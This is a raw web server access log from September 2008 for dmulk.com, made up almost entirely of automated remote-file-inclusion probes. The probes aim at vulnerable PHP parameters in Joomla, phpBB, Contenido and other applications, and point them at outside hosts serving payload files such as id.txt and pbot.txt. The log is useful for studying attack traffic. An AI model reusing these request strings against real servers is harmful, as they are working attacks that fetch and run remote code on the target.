200.155.18.50 - - [12/Sep/2008:09:56:34 -0700] "GET /logs/access_080326.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:40 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:56:42 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.251.34 - - [12/Sep/2008:09:56:55 -0700] "GET /index.php?option=com_messages&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89434 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:56 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:56 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:57 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:57 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:57 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:56:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:57:00 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:57:00 -0700] "GET /logs/access_080603.log/include/Classes.inc.php?tm_includepath=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:09:57:02 -0700] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:57:02 -0700] "GET /logs/access_080614.log/include/Classes.inc.php?tm_includepath=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:57:45 -0700] "GET /logs/access_080822.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:57:48 -0700] "GET /logs/access_080822.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:57:52 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:09:57:52 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
71.112.228.70 - - [12/Sep/2008:09:58:08 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
77.221.130.13 - - [12/Sep/2008:09:58:10 -0700] "GET /logs/access_080522.log/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:09:58:11 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.13 - - [12/Sep/2008:09:58:11 -0700] "GET /logs/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.251.10.157 - - [12/Sep/2008:09:58:43 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.xscan.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:58:44 -0700] "GET /logs/access_080326.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:58:45 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:58:45 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:58:45 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:09:58:54 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.241 - - [12/Sep/2008:09:59:10 -0700] "GET /logs/access_080815.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.61.244.6 - - [12/Sep/2008:09:59:12 -0700] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.231.35.38 - - [12/Sep/2008:09:59:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dindondago.it/l333tbi1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:09:59:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:09:59:51 -0700] "GET /logs/access_080512.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.ps-mag.com/magazine/2007/10/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
128.121.94.49 - - [12/Sep/2008:09:59:52 -0700] "GET /logs/access_080726.log//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.94.49 - - [12/Sep/2008:09:59:52 -0700] "GET /logs//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.94.49 - - [12/Sep/2008:09:59:52 -0700] "GET /logs/access_080727.log//hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.94.49 - - [12/Sep/2008:09:59:52 -0700] "GET //hpmaker/index.php?p=http://h1.ripway.com/085298226543/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:00 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:00:11 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:00:11 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:00:16 -0700] "GET /logs/access_080403.log%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:00:34 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:00:34 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:00:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:00:35 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:35 -0700] "GET /logs/access_071214.log//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:36 -0700] "GET //?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 89089 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:37 -0700] "GET /logs//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 64721 "-" "libwww-perl/5.79" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:10:00:39 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:41 -0700] "GET /logs/access_071214.log//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:42 -0700] "GET //?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 89089 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:10:00:43 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:00:43 -0700] "GET /logs//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 64721 "-" "libwww-perl/5.79" "www.dmulk.com"
77.74.198.93 - - [12/Sep/2008:10:00:43 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:10:00:56 -0700] "GET /logs/access_080812.log/index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.77.120 - - [12/Sep/2008:10:00:58 -0700] "GET /index.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89449 "-" "libwww-perl/5.803" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:00:58 -0700] "GET /logs/access_080401.log/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:01:00 -0700] "GET /main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:01:05 -0700] "GET /logs/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:01:27 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:01:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:01:27 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:01:27 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:01:28 -0700] "GET /logs/access_080522.log/error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.155.18.50 - - [12/Sep/2008:10:01:28 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:01:31 -0700] "GET /error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:01:32 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:01:33 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://border-collie-home.de/components/com_zoom/images/pbot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:01:33 -0700] "GET /logs/error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
123.214.171.33 - - [12/Sep/2008:10:01:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dindondago.it/l333tbi1t.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:01:42 -0700] "GET /logs/access_080829.log/index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:01:43 -0700] "GET /index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89413 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:01:44 -0700] "GET /logs/index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:01:47 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:01:47 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:01:47 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:01:48 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:01:48 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:01:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:01:57 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.171 - - [12/Sep/2008:10:02:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dindondago.it/l333tbi1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
212.227.114.181 - - [12/Sep/2008:10:02:17 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89424 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:02:46 -0700] "GET /logs/access_080505.log/main.php?appserv_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:02:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.114.177 - - [12/Sep/2008:10:02:54 -0700] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89409 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:10:03:00 -0700] "GET /logs/access_080403.log%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:03:01 -0700] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:03:03 -0700] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:03:13 -0700] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:03:25 -0700] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:10:03:34 -0700] "GET /logs/access_080524.log/index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:03:42 -0700] "GET /logs/access_080708.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:03:42 -0700] "GET /interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:03:44 -0700] "GET /logs/access_080619.log/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:03:45 -0700] "GET /logs/interna.php?meio=http://ownedyoubox.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:03:45 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:03:46 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:03:49 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
